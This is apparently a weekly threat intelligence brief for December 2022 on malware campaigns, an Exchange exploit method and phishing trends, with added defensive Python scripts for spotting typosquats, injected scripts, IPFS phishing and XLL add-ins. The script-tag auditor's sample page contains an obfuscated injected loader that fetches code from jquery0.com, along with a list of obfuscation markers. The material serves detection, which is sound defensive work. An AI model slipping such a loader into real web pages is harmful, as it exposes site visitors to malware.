Cyber Intel Brief: Dec 15 – 21, 2022

New Techniques

DarkTortilla Malware Delivered via New Methods

Impacted Industries: All

What You Need To Know:

Cybercriminals are likely using typosquatting or search engine results to distribute DarkTortilla malware through websites impersonating Grammarly (active) and Cisco (non-operational; we expect it to be rehosted or moved to a different URL), as discovered by Cyble. Threat actors could also deliver links to these websites through phishing emails. DarkTortilla is known to drop multiple stealers, Remote Access Trojans, and Cobalt Strike. According to open-source reporting, an average of 93 unique samples were uploaded weekly to VirusTotal from January 2021 through May 2022. The primary motive for these attacks is likely financial gain, though some threat actors may have nation-state interests. Customers should share images of the impersonated sites with end users and include the Drive-by Compromise technique [T1189] in their cybersecurity awareness program.
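Impersonation sites of the kind described above are usually registered under names that differ from the real brand by one character, a look-alike substitution, or an appended word. The following Python script is an added example, not Deepwatch's or Cyble's tooling, that flags such domains in a newly-registered-domain feed or proxy log. The brand list, the allowlist of legitimate domains, the confusable table and the sample domains are constructed for the example; the TLD-splitting is a simplification that a production tool would replace with the Public Suffix List.

```python
# Added example (not Deepwatch's or Cyble's tooling): flag look-alike domains
# for a set of protected brands, as seen in newly registered domain feeds,
# certificate transparency logs, or proxy logs.

# Brands named in the brief; a real deployment loads its own list.
PROTECTED_BRANDS = ("grammarly", "cisco")
# Legitimate domains for those brands (constructed allowlist; verify for your tenant).
LEGIT_DOMAINS = {"grammarly.com", "cisco.com"}
# Character substitutions commonly used to imitate a brand (constructed table).
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("-", ""))


def normalize(label):
    """Lower-case a label and undo common look-alike substitutions."""
    label = label.lower()
    for src, dst in CONFUSABLES:
        label = label.replace(src, dst)
    return label


def levenshtein(a, b):
    """Edit distance between two strings (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(host):
    """Label left of the TLD. Simplification: a production tool should use the
    Public Suffix List so that names like 'brand.co.uk' are handled correctly."""
    parts = host.split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def check_domain(domain):
    """Return (brand, reason) when the domain imitates a protected brand, else None."""
    host = domain.strip().lower().rstrip(".")
    if host in LEGIT_DOMAINS or any(host.endswith("." + d) for d in LEGIT_DOMAINS):
        return None
    label = registrable_label(host)
    norm = normalize(label)
    for brand in PROTECTED_BRANDS:
        if label == brand:
            return (brand, "brand name on an unexpected TLD")
        if norm == brand:
            return (brand, "confusable characters")
        if brand in host or brand in norm:
            return (brand, "brand name embedded in hostname")
        if levenshtein(norm, brand) <= 1:
            return (brand, "one edit away from brand")
    return None


def scan(domains):
    """Map each suspicious domain to its (brand, reason)."""
    findings = {}
    for d in domains:
        hit = check_domain(d)
        if hit:
            findings[d] = hit
    return findings


# Constructed sample input resembling a newly-registered-domain feed.
SAMPLE_DOMAINS = [
    "www.grammarly.com", "grammarly.net", "grarnmarly.com",
    "grammar1y-download.com", "cisc0.net", "cisco-updates.com",
    "gramarly.com", "example.org",
]

if __name__ == "__main__":
    for domain, (brand, reason) in scan(SAMPLE_DOMAINS).items():
        print(f"{domain:28} imitates {brand}: {reason}")
```

The edit-distance rule produces false positives for short brand names (five-letter brands have many legitimate neighbours one edit away), so in practice it is tuned per brand or used only to prioritise review rather than to block.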


New Techniques

New Exploit Method Discovered for Microsoft Exchange

Impacted Industries: All

What You Need To Know:

Cybercriminals are highly likely to download publicly available scripts and tools and scan for vulnerable systems to exploit a vulnerability in Microsoft Exchange servers discovered by CrowdStrike. In its report, CrowdStrike provided the location to download the exploit code and other tools. Because the exploit code is publicly available, we expect exploitation attempts to increase in the coming months. CrowdStrike discovered that cybercriminals are using the Outlook Web Application (OWA) endpoint to access the Remote PowerShell service and drop tooling for persistent access to vulnerable Microsoft Exchange servers, bypassing known vulnerabilities in the Autodiscover endpoint. If successful, this technique could allow cybercriminals to access email and calendar information, potentially exposing sensitive or confidential data, and to use the Exchange server as a launching point for further network attacks. Customers may also face significant downtime, disruption, and financial losses, including ransom demands.


Malware

Glupteba Botnet Reemerges After Google Disruption In Late 2021

Impacted Industries: All

What You Need To Know:

Cybercriminals will likely leverage the Bitcoin blockchain, a technique employed by the Glupteba botnet, to distribute C2 domains in their campaigns or to carry out other tasks. This assessment follows Nozomi Networks' discovery that the botnet has reemerged: after Google disrupted its operation in December 2021, it took only six months to build a new campaign from scratch and distribute it on a larger scale. The botnet has infected devices worldwide through online ad campaigns and infected installers or software cracks. Its operators are known for stealing user credentials and cookies, mining cryptocurrencies on infected hosts, deploying and operating proxy components, and offering services such as selling access to virtual machines loaded with stolen credentials and proxy access.


Malware

New Stealer Malware Discovered

Impacted Industries: All

What You Need To Know:

Cybercriminals are highly likely to be using additional methods to distribute a new stealer dubbed RisePro, discovered by Flashpoint, whose analysis identified that the PrivateLoader network of websites claiming to provide “cracked” software delivered some samples of the malware. Flashpoint identified over 2,000 individual logs (we assume 2,000 computers were infected) for sale on the cybercriminal marketplace Russian Market. Other marketplaces may also be selling data stolen by RisePro, which would increase the number of infected devices. Customers should train users on the dangers of downloading unsafe software and of logging in to corporate accounts on personal devices.


Malware

Cybercriminals Inject Malicious Code on 160 Websites, Redirecting Visitors to Phishing Pages

Impacted Industries: All

What You Need To Know:

Cybercriminals have registered, or will likely register, other domains after Sucuri identified 160 websites (likely more exist) that cybercriminals injected with a malicious script. When a user visits a compromised site, it executes a script hosted on jquery0[.]com that redirects visitors to phishing pages. This redirect is only one possible variation: Malwarebytes, for example, linked the domain to the FakeUpdates and SocGholish malware campaigns. Any cybercriminal can target specific organizations or industries by researching which websites employees most frequently share and discuss on social media and attempting to inject malicious code into those sites.
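An injection of this kind leaves a visible artifact in the served HTML: a script tag, or an inline loader, that pulls code from a host the site owner never approved. The following Python script is an added example, not Sucuri's or Malwarebytes' tooling, that audits a page's script tags against an allowlist and flags inline code that references outside hosts or carries common obfuscation markers. The sample page, the site host, the allowlist and the marker list are constructed; the loader domain in the sample is the one named in the brief, refanged so the check can match it.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Added example (not Sucuri's or Malwarebytes' tooling): audit a page's <script>
# tags for third-party loaders that are not on the site owner's allowlist and for
# inline code that pulls in scripts from elsewhere or shows obfuscation markers.

# Strings that rarely appear in legitimate first-party inline code (constructed list).
OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode", "atob(", "document.write(")
# Matches host names in absolute or protocol-relative URLs inside script text.
HOST_RE = re.compile(r"(?:https?:)?//([A-Za-z0-9.-]+\.[A-Za-z]{2,})")


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies with line numbers."""

    def __init__(self):
        super().__init__()
        self.external = []  # (line, src)
        self.inline = []    # (line, body)
        self._buf = None
        self._line = 0

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append((self.getpos()[0], src))
        else:
            self._buf, self._line = [], self.getpos()[0]

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append((self._line, "".join(self._buf)))
            self._buf = None


def audit_page(html, site_host, allowed_hosts):
    """Return a list of (line, finding, value) for suspicious script usage."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    trusted = {site_host.lower()} | {h.lower() for h in allowed_hosts}
    findings = []
    for line, src in parser.external:
        host = urlparse(src).netloc.lower()
        if host and host not in trusted:  # relative paths have no netloc
            findings.append((line, "third-party script host not on allowlist", host))
    for line, body in parser.inline:
        for host in HOST_RE.findall(body):
            if host.lower() not in trusted:
                findings.append((line, "inline script references third-party host", host.lower()))
        for marker in OBFUSCATION_MARKERS:
            if marker in body:
                findings.append((line, "obfuscation marker in inline script", marker))
    return findings


# Constructed page: one legitimate CDN, one injected loader (the domain named in
# the brief), and an injected inline loader that hides the URL scheme.
SAMPLE_HTML = "\n".join([
    "<html><head>",
    '<script src="/static/app.js"></script>',
    '<script src="https://cdn.example-cdn.net/jquery.min.js"></script>',
    '<script src="//jquery0.com/jquery.min.js"></script>',
    "</head><body>",
    "<p>Welcome</p>",
    "<script>var s=document.createElement('script');"
    "s.src=String.fromCharCode(104,116,116,112)+'s://jquery0.com/r.js';"
    "document.head.appendChild(s);</script>",
    "</body></html>",
])

if __name__ == "__main__":
    for line, finding, value in audit_page(SAMPLE_HTML, "www.example.com", {"cdn.example-cdn.net"}):
        print(f"line {line}: {finding}: {value}")
```

Run against a stored copy of each page on a schedule and diff the findings over time: an injection shows up as a new third-party host or a new inline loader that was not present in the previous run, which is far easier to review than the raw HTML.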


Threat Landscape

The Rising Trend of IPFS Based Phishing

Impacted Industries: All

What You Need To Know:

Cybercriminals will likely continue hosting malicious content on InterPlanetary File System (IPFS) gateways and using them to conduct phishing campaigns, posing an emerging threat to customers. Recently, Trend Micro observed a steady increase in the use of IPFS gateways for phishing attacks, with 3,966 unique content identifiers used for phishing. IPFS is a decentralized, peer-to-peer protocol for sharing and storing files, which cybercriminals abuse for phishing and for distributing malware. The decentralized nature of IPFS makes it difficult to delete malicious content hosted on it, which makes it easier for cybercriminals to launch phishing campaigns and harder for victims to identify and protect themselves. Falling victim to a phishing attack can result in the loss of sensitive data, financial losses, reputational damage, legal consequences, and disruption of business operations. Customers should be vigilant and use tools and practices to detect and prevent IPFS-related phishing attacks.
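Because the same IPFS content is reachable through any public gateway, blocking one gateway URL does little; the durable key is the content identifier (CID) in the URL, which is the unit Trend Micro counted above. The following Python script is an added example, not Trend Micro's tooling, that extracts path-style and subdomain-style gateway URLs from proxy log lines, pulls out the CID, and groups sightings by CID. The CID values and log lines are constructed (the gateway host names are real public gateways), and the CID length rules cover the common CIDv0 and base32 CIDv1 forms only.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Added example (not Trend Micro's tooling): pull IPFS gateway URLs out of proxy
# log lines, extract the content identifier (CID), and group sightings by CID so
# that blocking decisions key on the content rather than on one gateway host.

# CIDv0 is "Qm" + 44 base58 characters; CIDv1 in its usual base32 form starts
# with "b" and is 59 lower-case characters. The lengths here are the common cases.
CID = r"(?:Qm[1-9A-HJ-NP-Za-km-z]{44}|b[a-z2-7]{55,})"
PATH_GATEWAY_RE = re.compile(
    r"https?://(?P<host>[A-Za-z0-9.-]+)(?::\d+)?/ipfs/(?P<cid>" + CID + r")[^\s]*")
SUBDOMAIN_GATEWAY_RE = re.compile(
    r"https?://(?P<cid>" + CID + r")\.ipfs\.(?P<host>[A-Za-z0-9.-]+)[^\s]*")


def extract_ipfs_refs(text):
    """Return one dict per IPFS gateway URL found in text."""
    refs = []
    for form, pattern in (("path", PATH_GATEWAY_RE), ("subdomain", SUBDOMAIN_GATEWAY_RE)):
        for m in pattern.finditer(text):
            query = urlparse(m.group(0)).query
            refs.append({
                "url": m.group(0),
                "gateway": m.group("host").lower(),
                "cid": m.group("cid"),
                "form": form,
                # A recipient address pre-filled in the query string is a common
                # phishing-kit pattern worth surfacing to the analyst.
                "prefilled_email": "@" in query or "%40" in query,
            })
    return refs


def group_by_cid(refs):
    """Map each CID to the set of gateways it was fetched through."""
    seen = defaultdict(set)
    for r in refs:
        seen[r["cid"]].add(r["gateway"])
    return dict(seen)


# Constructed CIDs and proxy log lines (gateway hosts are real public gateways).
CID_A = "Qm" + "abcdefghij" * 4 + "kmnp"      # 46 chars, base58 alphabet
CID_B = "bafybei" + "a" * 52                   # 59 chars, base32 alphabet
SAMPLE_LOG = "\n".join([
    f"2022-12-19T10:01:02Z proxy GET https://ipfs.io/ipfs/{CID_A}/login.html",
    f"2022-12-19T10:02:11Z proxy GET https://{CID_A}.ipfs.dweb.link/login.html",
    f"2022-12-19T10:03:45Z proxy GET https://cloudflare-ipfs.com/ipfs/{CID_B}?email=user%40example.com",
    "2022-12-19T10:04:00Z proxy GET https://www.example.com/ipfs-explained.html",
])

if __name__ == "__main__":
    refs = extract_ipfs_refs(SAMPLE_LOG)
    for cid, gateways in group_by_cid(refs).items():
        print(f"{cid[:16]}... seen via {sorted(gateways)}")
```

Grouping by CID is what makes a block list survive gateway hopping: once a CID is confirmed as a phishing page, every gateway URL carrying it can be blocked with one rule, and new gateways seen for a known-bad CID are flagged automatically.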


Threat Landscape

The Rising Trend of Excel XLL Add-ins

Impacted Industries: All

What You Need To Know:

Cybercriminals are expected to discontinue using VBA-based malicious documents, relying instead on formats such as XLLs or exploiting newly discovered vulnerabilities. This assessment is based on Cisco Talos's estimate that an increasing number of cybercriminals and commodity malware families are using malicious add-ins, specifically XLL files, as a vector for introducing malicious code into Microsoft Excel. These add-ins are executable code that can be added to Office applications to extend their appearance or functionality; if an attacker can place one in a trusted location, it is loaded into the application's process space. Several notable cybercriminal groups, including TA410, FIN7, Dridex, and Formbook, are known to use XLL add-ins. The potential impacts of an attack using this method include stealing sensitive information, disrupting operations, launching ransomware attacks, installing spyware, and turning the victim's device into part of a botnet, which could result in financial loss, reputational damage, and loss of productivity for the victim.
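An XLL is a native DLL that exports the entry points Excel calls when it loads an add-in, so a content check is more reliable than trusting the file extension, which a dropper can rename. The following Python script is an added example, not Cisco Talos's tooling, that parses a PE export table and reports which Excel SDK entry points (xlAutoOpen and the related names) the file exports. The minimal PE image built by `build_sample_pe` is a constructed test fixture that only exercises the parser; it is not a loadable DLL.

```python
import struct

# Added example (not Cisco Talos's tooling): identify an XLL add-in by what it
# is, a PE DLL exporting the entry points Excel calls when loading add-ins,
# rather than by its file extension, which a dropper can rename at will.

# Exports defined by the Excel SDK for XLL add-ins.
XLL_ENTRYPOINTS = {"xlAutoOpen", "xlAutoClose", "xlAutoAdd", "xlAutoRemove",
                   "xlAutoRegister12", "xlAutoFree12", "xlAddInManagerInfo12"}


def _rva_to_offset(rva, sections):
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} not backed by any section")


def pe_export_names(data):
    """Return the exported symbol names of a PE32/PE32+ image held in bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe, = struct.unpack_from("<I", data, 0x3C)            # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect, = struct.unpack_from("<H", data, pe + 6)
    opt_size, = struct.unpack_from("<H", data, pe + 20)
    opt = pe + 24                                          # optional header
    magic, = struct.unpack_from("<H", data, opt)
    data_dirs = opt + (96 if magic == 0x10B else 112)      # PE32 vs PE32+
    exp_rva, _exp_size = struct.unpack_from("<II", data, data_dirs)  # entry 0 = export
    if exp_rva == 0:
        return []
    sections = []
    table = opt + opt_size
    for i in range(nsect):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, table + 40 * i + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    exp = _rva_to_offset(exp_rva, sections)
    n_names, = struct.unpack_from("<I", data, exp + 24)    # NumberOfNames
    names_rva, = struct.unpack_from("<I", data, exp + 32)  # AddressOfNames
    names = _rva_to_offset(names_rva, sections)
    out = []
    for i in range(n_names):
        name_rva, = struct.unpack_from("<I", data, names + 4 * i)
        start = _rva_to_offset(name_rva, sections)
        out.append(data[start:data.index(b"\0", start)].decode("ascii"))
    return out


def xll_entrypoints(data):
    """Sorted XLL entry points exported by the image; empty if it is not an XLL."""
    return sorted(set(pe_export_names(data)) & XLL_ENTRYPOINTS)


def build_sample_pe(export_names):
    """Constructed test fixture: a minimal PE32 DLL carrying only an export table.
    It is not loadable; it exists only to exercise the parser above."""
    sec_rva, sec_raw = 0x1000, 0x200
    n = len(export_names)
    funcs_rva = sec_rva + 40                 # after the 40-byte export directory
    names_rva = funcs_rva + 4 * n
    ords_rva = names_rva + 4 * n
    strings_rva = ords_rva + 2 * n
    strings, name_rvas = b"", []
    for name in export_names:
        name_rvas.append(strings_rva + len(strings))
        strings += name.encode("ascii") + b"\0"
    section = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, 0, 1, n, n, funcs_rva, names_rva, ords_rva)
    section += b"".join(struct.pack("<I", 0x2000 + 16 * i) for i in range(n))  # dummy code RVAs
    section += b"".join(struct.pack("<I", r) for r in name_rvas)
    section += b"".join(struct.pack("<H", i) for i in range(n))
    section += strings
    section = section.ljust(0x200, b"\0")
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)
    opt = struct.pack("<H", 0x10B).ljust(96, b"\0")                   # only Magic is set
    dirs = struct.pack("<II", sec_rva, len(section)) + b"\0" * (8 * 15)
    sect = struct.pack("<8sIIIIIIHHI", b".edata", len(section), sec_rva, len(section),
                       sec_raw, 0, 0, 0, 0, 0x40000040)
    return (dos + coff + opt + dirs + sect).ljust(sec_raw, b"\0") + section


if __name__ == "__main__":
    print(xll_entrypoints(build_sample_pe(["DllRegisterServer", "xlAutoOpen", "xlAutoClose"])))
    print(xll_entrypoints(build_sample_pe(["DllGetClassObject"])))
```

A non-empty result identifies the file as an XLL, not as malicious: legitimate add-ins export the same names. The value is in inventory, for instance running the check over Excel's startup and trusted locations and over e-mail attachments, so that any XLL that is not on the organisation's approved list is reviewed.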


What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team's estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not happen. Terms like “might” reflect situations where we are unable to assess the likelihood, usually because the relevant information is lacking, sketchy, or fragmented. Terms like “we can't dismiss,” “we can't rule out,” and “we can't discount” refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.
